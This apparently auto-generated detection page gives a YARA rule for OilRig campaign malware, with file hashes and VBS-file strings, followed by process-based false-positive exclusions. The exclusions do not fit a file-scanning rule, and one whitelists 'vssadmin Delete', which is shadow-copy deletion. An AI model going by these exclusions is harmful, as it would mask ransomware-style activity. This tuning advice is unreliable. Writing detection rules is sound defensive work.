Adversaries from the OilRig campaign may use custom malware to establish persistence and exfiltrate data, leveraging low-severity indicators that require proactive hunting. SOC teams should actively investigate these patterns in Azure Sentinel to identify and mitigate potential long-term compromise and data theft.
YARA Rule
rule OilRig_Malware_Campaign_Gen3
{
meta:
description = "Detects malware from OilRig Campaign"
author = "Florian Roth"
reference = "https://goo.gl/QMRZ8K"
date = "2016-10-12"
hash1 = "5e9ddb25bde3719c392d08c13a295db418d7accd25d82d020b425052e7ba6dc9"
hash2 = "bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9"
hash3 = "90639c7423a329e304087428a01662cc06e2e9153299e37b1b1c90f6d0a195ed"
strings:
$x1 = "source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr" fullword ascii
$x2 = "\\Libraries\\fireueye.vbs" fullword ascii
$x3 = "\\Libraries\\fireeye.vbs&" fullword wide
condition:
( uint16(0) == 0xcfd0 and filesize < 100KB and 1 of them )
}This YARA rule can be deployed in the following contexts:
This rule contains 3 string patterns in its detection logic.
Scenario: Legitimate system update or patching activity using msiexec.exe
Filter/Exclusion: process.name = msiexec.exe and process.args contains " /quiet" or " /passive"
Scenario: Scheduled backup job using vssadmin.exe to create shadow copies
Filter/Exclusion: process.name = vssadmin.exe and process.args contains " Create" or " Delete"
Scenario: Admin task using taskkill.exe to terminate a process for maintenance
Filter/Exclusion: process.name = taskkill.exe and process.args contains "/F /IM"
Scenario: Legitimate remote desktop session using mstsc.exe with administrative credentials
Filter/Exclusion: process.name = mstsc.exe and process.args contains "/admin" or "/console"
Scenario: Use of powershell.exe for routine system monitoring or log analysis
Filter/Exclusion: process.name = powershell.exe and process.args contains "Get-EventLog" or "Get-Event" or "Get-Counter"